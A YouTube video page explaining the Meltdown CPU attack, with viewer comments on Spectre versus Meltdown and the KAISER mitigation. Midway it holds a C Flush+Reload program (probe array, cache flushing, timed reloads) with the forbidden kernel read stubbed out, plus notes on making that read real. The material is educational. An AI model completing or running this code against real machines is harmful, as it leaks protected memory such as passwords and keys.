Meltdown explained like you're five
- Published on 5 Feb 2025
Find out how a typical Meltdown attack works in this video that simplifies the code & concept behind it.
Even though there are many prerequisites to explaining how Meltdown works, I've simplified most of the concepts into a 3 minute video.
Subscribe for more videos ► bit.ly/jadjoubran
Icons designed by Freepik, Hadrien & Smashicons from Flaticon
Interested in learning JavaScript and/or React? Checkout my interactive online courses:
- Learn JavaScript: learnjavascript.online
- React Tutorial: react-tutorial.app
First explanation out of 10 I've watched where the author actually read the paper! Thank you very much Jad!
That was the hardest part 😅 I'm glad you like it! I'd appreciate it if you can share it
Again, I have the same problems with this as with your spectre explanation.
What do you mean by "character[secret+15]" ??!!
If secret is 'p', how are you accessing "element number 'p'+15" in the array ?!!
The attacker constructed the character array themselves so there is nothing preventing them from accessing it.
The attacker doesn't need to access the original data set directly. The character array they created themselves is used to infer the value they attempted to access from the protected data set.
@alexhaigh9575 you did not answer his question
@AnPham-uz3td I did, but to break it down further for you.
You access "array[p+15]" by iterating the array.
As you created the array yourself it is not protected, so you can loop it and access all the values.
Yes, I believe that's a typo. It should be characters[15]. The idea is to guess the secret value already present in cache. When accessing all elements in the characters array, some element character[i] will take less time because of already being present in cache, and this is exactly the secret value (since the secret value was present in the cache to begin with). I could be wrong but this is what I got.
You’re about to save me on my CSE 325 final 😂
Great video! Your example at 2:52 is close but incorrect. The CPU would raise an exception trying to convert the virtual memory address associated with `readCharacter(1000)` as the permission bit would indicate that it is trying to access restricted memory so secret is never cached like you state in the video.
Instead what would be correct is if you speculatively execute some array access after like `probe_array[4096 * secret]` (Assuming 4096 byte pages) which would then correctly cache the data associated with that array. There are other reasons for indexing into an array which deal with the hardware prefetcher caching adjacent lines of memory if they are not spread out enough. Then you can go through `probe_array` with flush+reload and look for the page access with the fastest time.
I do think your explanation provides utility to those that haven't read the paper however because it demonstrates the concept of the cache as a side channel used in the attack and the attack mentioned in the paper can be hard to wrap your head around the first time you read through. Well done on this video!
Yeah, I was gonna say, because the error you'd get is a page fault, which is pretty useless, and you also don't get access to page table mappings because first you don't need it and secondly it's a security risk.
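The receiver half of the attack described in the comment above, as an added example that is not code from the video or its author: a probe array with one page per possible byte value, Flush+Reload over it, and the fastest slot taken as the leaked byte. The forbidden read that would fault is not performed here; `transient_touch` stands in for the load `probe_array[4096 * secret]` that the CPU would execute transiently, because the real step needs unpatched hardware and a SIGSEGV handler. The function names, the 4096-byte page size, the 20-round majority vote and the sample secret "password" are all assumptions of this example, and the x86-64 intrinsics (`_mm_clflush`, `__rdtscp`) are what make the channel work.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#if defined(__x86_64__)
#include <x86intrin.h>   /* _mm_clflush, _mm_mfence, __rdtscp */
#endif

#define PAGE_SIZE 4096   /* assumed page size, as in the comment above */
#define SLOTS 256        /* one slot per possible byte value */

/* Probe array: 256 slots one page apart, so the hardware prefetcher does not
 * warm a neighbouring slot when one of them is touched. */
static uint8_t probe_array[SLOTS * PAGE_SIZE] __attribute__((aligned(PAGE_SIZE)));

/* Evict one line from every cache level (no-op off x86-64: no portable flush). */
static inline void flush_line(const void *p) {
#if defined(__x86_64__)
    _mm_clflush(p);
#else
    (void)p;
#endif
}

/* Load one byte and return how long it took (cycles on x86-64, ns elsewhere). */
static inline uint64_t timed_load(const volatile uint8_t *p) {
#if defined(__x86_64__)
    unsigned int aux;
    uint64_t t0 = __rdtscp(&aux);
    (void)*p;
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
#else
    struct timespec a, b;
    clock_gettime(CLOCK_MONOTONIC, &a);
    (void)*p;
    clock_gettime(CLOCK_MONOTONIC, &b);
    return (uint64_t)((b.tv_sec - a.tv_sec) * 1000000000LL + (b.tv_nsec - a.tv_nsec));
#endif
}

/* Stand-in for the transient access probe_array[PAGE_SIZE * secret]. In Meltdown
 * the CPU performs this load out of order, before the fault from the forbidden
 * read is delivered; here it is an ordinary load (assumption of this example). */
static void transient_touch(uint8_t secret) {
    (void)*(volatile uint8_t *)(probe_array + (size_t)secret * PAGE_SIZE);
}

/* Flush step of Flush+Reload: every slot leaves the cache. */
static void flush_probe(void) {
    for (int i = 0; i < SLOTS; i++)
        flush_line(probe_array + (size_t)i * PAGE_SIZE);
#if defined(__x86_64__)
    _mm_mfence();
#endif
}

/* Reload step: time every slot in a scrambled order so a stride prefetcher
 * cannot warm the next slot before it is measured (167 is odd, so the map is
 * a bijection on 0..255). */
static void reload_probe(uint64_t times[SLOTS]) {
    for (int i = 0; i < SLOTS; i++) {
        int slot = (i * 167 + 13) & 255;
        times[slot] = timed_load(probe_array + (size_t)slot * PAGE_SIZE);
    }
}

/* The slot that reloads fastest is the one the transient access cached;
 * its index is the leaked byte. */
static int decode_byte(const uint64_t times[SLOTS]) {
    int best = 0;
    for (int i = 1; i < SLOTS; i++)
        if (times[i] < times[best]) best = i;
    return best;
}

/* Deterministic check of the decoder on constructed timings: every slot
 * "misses" at 300, the chosen slot "hits" at 40. */
static int decode_demo(int fast_slot) {
    uint64_t times[SLOTS];
    for (int i = 0; i < SLOTS; i++) times[i] = 300;
    times[fast_slot & 255] = 40;
    return decode_byte(times);
}

/* One leaked byte, majority-voted over several rounds to ride out noise
 * from interrupts and context switches. */
static int leak_byte(uint8_t secret, int rounds) {
    uint64_t times[SLOTS];
    int hist[SLOTS] = {0};
    memset(probe_array, 1, sizeof probe_array);   /* fault every page in first */
    for (int r = 0; r < rounds; r++) {
        flush_probe();
        transient_touch(secret);
        reload_probe(times);
        hist[decode_byte(times)]++;
    }
    int best = 0;
    for (int i = 1; i < SLOTS; i++)
        if (hist[i] > hist[best]) best = i;
    return best;
}

int main(void) {
    const char secret[] = "password";   /* constructed sample secret */
    char leaked[sizeof secret] = {0};
    for (size_t i = 0; i < sizeof secret - 1; i++)
        leaked[i] = (char)leak_byte((uint8_t)secret[i], 20);
    printf("leaked through the cache: \"%s\"\n", leaked);
    return 0;
}
```

Build with gcc and run on an x86-64 machine; off x86-64 the flush is a no-op and the timings come from clock_gettime, so nothing will leak there. In a real Meltdown run the only piece that changes is `transient_touch`: it becomes the faulting read of a kernel address followed by the dependent probe load, with the SIGSEGV caught (or suppressed inside a TSX transaction) before the reload step runs.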
Underrated YouTuber, you are great, subbed!
Thanks for the effort and simplification. However: (1) it is actually Spectre that can read another process memory while Meltdown can't - and not vice versa. Meltdown is the easier exploit, mitigated by KAISER. (2) chars[secret+15] being read fast does *not* mean that secret==15. Perhaps you meant to write just chars[15]?
Thanks Ofek! (1) According to spectreattack.com/spectre.pdf Spectre can only read from the current process. For example, JavaScript that is being compiled JIT can escape its sandbox mode and read data from the current process. Whereas Meltdown allows reading data from other processes (meltdownattack.com/meltdown.pdf)
(2) correct, this is an over-simplification for measuring access time when probing the whole array (i.imgur.com/2nJ0IV2.png)
Jad Joubran The JavaScript example is the least interesting in the paper. Cf. section 5 for the cross-process technique - specifically the section on the Windows implementation example (that ends with 'The completed attack allows the reading of memory
from the victim process.'). Also please read on the KAISER patch, which already pretty much mitigated Meltdown in Linux.
Yes indeed, the KAISER patch which was recently deployed helped mitigate the issue on Linux
Jad Joubran Spectre will not have a patch in the near future (retpoline is a promising idea, but it is at the compiler level). Spectre is by far the worse one.
Didn't understand the difference with the Spectre 👻 one, seems to be pretty much the same. Is it just because it's in another program?
They are very similar, however Spectre takes advantage of speculative execution in branch prediction (when there's an if) whereas meltdown takes advantage of out-of-order execution (multiple lines of code that are running more or less at the same time)
Jad Joubran oh 👌, thanks!
Btw, is there a reason only Meltdown can be patched and not Spectre 👻 (with a patch) ?
Meltdown is being mitigated by enabling KAISER (en.wikipedia.org/wiki/Kernel_page-table_isolation) which was already developed a few years ago but not fully deployed.
Whereas for Spectre it seems that a decent fix would require changes to the CPU itself
Jad Joubran thanks for the confirmation. 💪
It is not shown how out-of-order execution leads to the attack. You used the same template as for Spectre.
To the best of my understanding, the main difference between Spectre and Meltdown is that Spectre exploits a mis-trained branch predictor, and Meltdown exploits a seg fault. Is this roughly correct?
(Context: I think I understand Spectre really well, but I don't get how meltdown differs from Spectre)
Why can Spectre only access within the same program while Meltdown works between different programs?
Holy crap, I've been reading the paper for a while and I still hadn't understood how they exfiltrated data from the cache. Now I do, thanks!
Very well explained and easy to understand!
I'm glad you like it :D
Hi Jad, from my understanding, there isn't any use of transient instructions in the video, am I right? Or perhaps do you mean that the probing of the characters[secret] is done simultaneously as secret = readCharacter(1000)? (which does not seem right to me)
Yes indeed, probing the array happens as a transient instruction right before the CPU realizes that this is a segmentation fault and that the current program doesn't have access to that secret value
Amazing video, quick informative and to the point.
I'm glad that you like it! I also always love it when videos are concise
very helpful, appreciated
Thank you very much !!
Nicely done, subscribed.
Awesome! I'm glad you like it :D
Very helpful. Question for you on the Meltdown attack. Say the attacker has 2 lines of code. Line 1 raises an exception while reading restricted memory. This exception stores secret data into the CPU cache. Line 2 tries to guess the secret data in the CPU cache. The CPU will raise an exception at line 1, but continues to execute line 2 due to out-of-order execution. Is it right that the attacker guesses the cache data by executing line 2?
I still can't get the difference between Spectre and Meltdown
Thank you :)
My pleasure 😃
I never send diagnostic data to the developer )))
Why did you remove my comment without even answering my question?
Masterpiece
Can you now explain like I'm three?